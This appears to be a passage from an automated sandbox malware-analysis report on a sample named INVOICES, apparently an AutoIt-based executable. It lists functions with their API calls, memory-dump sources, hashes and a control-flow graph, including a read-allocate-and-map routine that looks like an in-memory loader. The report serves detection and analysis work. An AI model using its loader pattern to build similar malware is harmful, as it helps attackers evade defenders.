                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996367037-0
                                                                                                                                  • Opcode ID: 68ab86c1c9273b9cedd6c1b009a3a5adae2731b48e99488a77a32f7967de7ea3
                                                                                                                                  • Instruction ID: cec8bf40550e13df4019a029019fd9019ffa7e54b656384544f3d7d2e3f0d6b4
                                                                                                                                  • Opcode Fuzzy Hash: 68ab86c1c9273b9cedd6c1b009a3a5adae2731b48e99488a77a32f7967de7ea3
                                                                                                                                  • Instruction Fuzzy Hash: CB51F4B2A4432A4FD722CA78DCC06607B91FB413667280738DDE2C73C5E7A0580E8BA1
                                                                                                                                  Function 0079449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,0076E6F1), ref: 007944AB
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 007944BC
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 007944CC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 48322524-0
                                                                                                                                  • Opcode ID: fc9edaf2b44ec5e4ab54139f53209fb8a7a34054a3d3e8c450b5dc3401948bda
                                                                                                                                  • Instruction ID: 77b9512d74ddc0e4e5e9f337b6e886ce9e2c83855a7e0f504092a660d13b01bc
                                                                                                                                  • Opcode Fuzzy Hash: fc9edaf2b44ec5e4ab54139f53209fb8a7a34054a3d3e8c450b5dc3401948bda
                                                                                                                                  • Instruction Fuzzy Hash: 4DE0D831810400574A10A738FC0DDED779CAE05335F108715F935C20E0E77C69108699
                                                                                                                                  Function 0073E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • Variable must be of type 'Object'., xrefs: 007741BB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Variable must be of type 'Object'.
                                                                                                                                  • API String ID: 0-109567571
                                                                                                                                  • Opcode ID: 901b216027ad2c46c2f3185421b0da08695a27d2d79695a9b0977d799598ef95
                                                                                                                                  • Instruction ID: 4d8434b2bb32c21c265fa3a0daacbdd38730c3b026c618f74d23f30452fa9fca
                                                                                                                                  • Opcode Fuzzy Hash: 901b216027ad2c46c2f3185421b0da08695a27d2d79695a9b0977d799598ef95
                                                                                                                                  • Instruction Fuzzy Hash: 47A27F75A00215CFEF24CF58C484AAEB7B1FF58310F648069E946AB392D779ED42CB91
                                                                                                                                  Function 00740B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00740BBB
                                                                                                                                  • timeGetTime.WINMM ref: 00740E76
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00740FB3
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00740FC1
                                                                                                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 0074105A
                                                                                                                                  • DestroyWindow.USER32 ref: 00741066
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00741080
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 007751DC
                                                                                                                                  • TranslateMessage.USER32(?), ref: 00775FB9
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00775FC7
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00775FDB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                  • API String ID: 4212290369-3242690629
                                                                                                                                  • Opcode ID: 65d5f5b3779ae568995e3b802184097f99f764d1e736d22c61cf73f5db7313a7
                                                                                                                                  • Instruction ID: f2b808fd8f95060324ba629b318edfdcdceb15faa73858687135ec5691121d34
                                                                                                                                  • Opcode Fuzzy Hash: 65d5f5b3779ae568995e3b802184097f99f764d1e736d22c61cf73f5db7313a7
                                                                                                                                  • Instruction Fuzzy Hash: F4B2D470608741DFDB24DF24C889BAAB7E5BF84344F14891DF589972A1DBBDE844CB82
                                                                                                                                  Function 007991FE Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00799008: __time64.LIBCMT ref: 00799012
                                                                                                                                    • Part of subcall function 00735045: _fseek.LIBCMT ref: 0073505D
                                                                                                                                  • __wsplitpath.LIBCMT ref: 007992DD
                                                                                                                                    • Part of subcall function 0075426E: __wsplitpath_helper.LIBCMT ref: 007542AE
                                                                                                                                  • _wcscpy.LIBCMT ref: 007992F0
                                                                                                                                  • _wcscat.LIBCMT ref: 00799303
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00799328
                                                                                                                                  • _wcscat.LIBCMT ref: 0079933E
                                                                                                                                  • _wcscat.LIBCMT ref: 00799351
                                                                                                                                    • Part of subcall function 0079904E: _memmove.LIBCMT ref: 00799087
                                                                                                                                    • Part of subcall function 0079904E: _memmove.LIBCMT ref: 00799096
                                                                                                                                  • _wcscmp.LIBCMT ref: 00799298
                                                                                                                                    • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998CD
                                                                                                                                    • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998E0
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007994FB
                                                                                                                                  • _wcsncpy.LIBCMT ref: 0079956E
                                                                                                                                  • DeleteFileW.KERNEL32(?,?), ref: 007995A4
                                                                                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007995BA
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007995CB
                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007995DD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1500180987-0
                                                                                                                                  • Opcode ID: 5784052dc12c5d2f4923ba39024f8641b6ad3097efab06c0b6803e531ea164cb
                                                                                                                                  • Instruction ID: 4a54ea939de790438e72d7c469afcde0eb29846334356a1dd112af247384093b
                                                                                                                                  • Opcode Fuzzy Hash: 5784052dc12c5d2f4923ba39024f8641b6ad3097efab06c0b6803e531ea164cb
                                                                                                                                  • Instruction Fuzzy Hash: 23C16CB1E00219AADF21DFA5DC85EDFB7BDEF44300F0040AAF609E6151DB789A848F65
                                                                                                                                  Function 007371EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00734864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007F52F8,?,007337C0,?), ref: 00734882
                                                                                                                                    • Part of subcall function 0075068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007372C5), ref: 007506AD
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00737308
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0076EC21
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0076EC62
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0076ECA0
                                                                                                                                  • _wcscat.LIBCMT ref: 0076ECF9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                  • API String ID: 2673923337-2727554177
                                                                                                                                  • Opcode ID: 35f17f623d2a21202cb50dfb02399ed70d6e2447bf904581971281720097f2f9
                                                                                                                                  • Instruction ID: 70b2f5f739227af1642516392582dcd89f505c5533d6f8e33e5ecba809df0535
                                                                                                                                  • Opcode Fuzzy Hash: 35f17f623d2a21202cb50dfb02399ed70d6e2447bf904581971281720097f2f9
                                                                                                                                  • Instruction Fuzzy Hash: 117180B1509301DED314EF29DC459ABBBF8FF98310F40852EF445831A1EB789949CBA6
                                                                                                                                  Function 00733A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00733A62
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00733A71
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00733A88
                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00733A9A
                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00733AAC
                                                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00733AD2
                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00733B28
                                                                                                                                    • Part of subcall function 00733041: GetSysColorBrush.USER32(0000000F), ref: 00733074
                                                                                                                                    • Part of subcall function 00733041: RegisterClassExW.USER32(00000030), ref: 0073309E
                                                                                                                                    • Part of subcall function 00733041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007330AF
                                                                                                                                    • Part of subcall function 00733041: LoadIconW.USER32(000000A9), ref: 007330F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                                  • Opcode ID: 5aed88df040dfb040e22c4fd9187126b3aff8e36a8367df294225ab61ddfa93f
                                                                                                                                  • Instruction ID: cee0591991bf3ec7c783e63c2679e8bd72f98969525f43a227784f3545709ead
                                                                                                                                  • Opcode Fuzzy Hash: 5aed88df040dfb040e22c4fd9187126b3aff8e36a8367df294225ab61ddfa93f
                                                                                                                                  • Instruction Fuzzy Hash: 11212DB1D10704AFEB10DFA4EC09BAD7FB5FB08725F108269F604A62A1D7B95650CF98
                                                                                                                                  Function 00733778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                                  • API String ID: 1825951767-3513169116
                                                                                                                                  • Opcode ID: 775727034bc8434c225fc3247bb805c00da4491739ad10731813532a091d1bd3
                                                                                                                                  • Instruction ID: 03252242458cef314e86de7e69b243a2f0e24b299b5ce4dc1efb20ecf50f8ed1
                                                                                                                                  • Opcode Fuzzy Hash: 775727034bc8434c225fc3247bb805c00da4491739ad10731813532a091d1bd3
                                                                                                                                  • Instruction Fuzzy Hash: BDA15EB291021DDAEB14EBA0CC99EEEB778BF14300F444529F516B7192DF7C6A09CB61
                                                                                                                                  Function 00733019 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73registrywindowclipboardCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00733074
                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0073309E
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007330AF
                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 007330F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                                  • Opcode ID: 9c7373f8c01fc1c00b9fee54784fac13a42742eceb33bb3cf7ec8d78173079a0
                                                                                                                                  • Instruction ID: 2751efc662387ef1551fd48e2cf87c420744a3fd581036aa213cdd207593c617
                                                                                                                                  • Opcode Fuzzy Hash: 9c7373f8c01fc1c00b9fee54784fac13a42742eceb33bb3cf7ec8d78173079a0
                                                                                                                                  • Instruction Fuzzy Hash: 60313AB1941709AFDB109FA4DC88BEDBBF4FB09710F14826AE690E62A0D7B94541CF94
                                                                                                                                  Function 00733041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00733074
                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0073309E
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007330AF
                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 007330F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                                  • Opcode ID: 2acf3671d7f7d23660ab7ba297e48101cbfa73437cbc763b3dcf686aac4155f6
                                                                                                                                  • Instruction ID: d69d749a4a4edd458731d491deb017ac037f5e4aa45c50f6bdea9b7b13775d51
                                                                                                                                  • Opcode Fuzzy Hash: 2acf3671d7f7d23660ab7ba297e48101cbfa73437cbc763b3dcf686aac4155f6
                                                                                                                                  • Instruction Fuzzy Hash: D021C9B1911618AFDB00DF94EC49BDDBBF4FB08B50F10822AF610A62A0D7B94544CF99
                                                                                                                                  Function 009425D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 960 9425d0-94267e call 940000 963 942685-9426ab call 9434e0 CreateFileW 960->963 966 9426b2-9426c2 963->966 967 9426ad 963->967 975 9426c4 966->975 976 9426c9-9426e3 VirtualAlloc 966->976 968 9427fd-942801 967->968 969 942843-942846 968->969 970 942803-942807 968->970 972 942849-942850 969->972 973 942813-942817 970->973 974 942809-94280c 970->974 977 9428a5-9428ba 972->977 978 942852-94285d 972->978 979 942827-94282b 973->979 980 942819-942823 973->980 974->973 975->968 981 9426e5 976->981 982 9426ea-942701 ReadFile 976->982 985 9428bc-9428c7 VirtualFree 977->985 986 9428ca-9428d2 977->986 983 942861-94286d 978->983 984 94285f 978->984 987 94282d-942837 979->987 988 94283b 979->988 980->979 981->968 989 942703 982->989 990 942708-942748 VirtualAlloc 982->990 993 942881-94288d 983->993 994 94286f-94287f 983->994 984->977 985->986 987->988 988->969 989->968 991 94274f-94276a call 943730 990->991 992 94274a 990->992 1000 942775-94277f 991->1000 992->968 997 94288f-942898 993->997 998 94289a-9428a0 993->998 996 9428a3 994->996 996->972 997->996 998->996 1001 942781-9427b0 call 943730 1000->1001 1002 9427b2-9427c6 call 943540 1000->1002 1001->1000 1008 9427c8 1002->1008 1009 9427ca-9427ce 1002->1009 1008->968 1010 9427d0-9427d4 CloseHandle 1009->1010 1011 9427da-9427de 1009->1011 1010->1011 1012 9427e0-9427eb VirtualFree 1011->1012 1013 9427ee-9427f7 1011->1013 1012->1013 1013->963 1013->968
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 009426A1
                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009428C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileFreeVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 204039940-0
                                                                                                                                  • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                                  • Instruction ID: 598dc633a38dc6bf5faa5bd0d5dfafca08c25f65db517b985d8d0caf3b6f4afb
                                                                                                                                  • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                                  • Instruction Fuzzy Hash: F6A10774E00209EBDB14CFA4C994FEEBBB5BF48304F208559E501BB280D779AA81DB54
                                                                                                                                  Function 007339E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1081 7339e7-733a57 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00733A15
                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733A36
                                                                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 00733A4A
                                                                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 00733A53
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
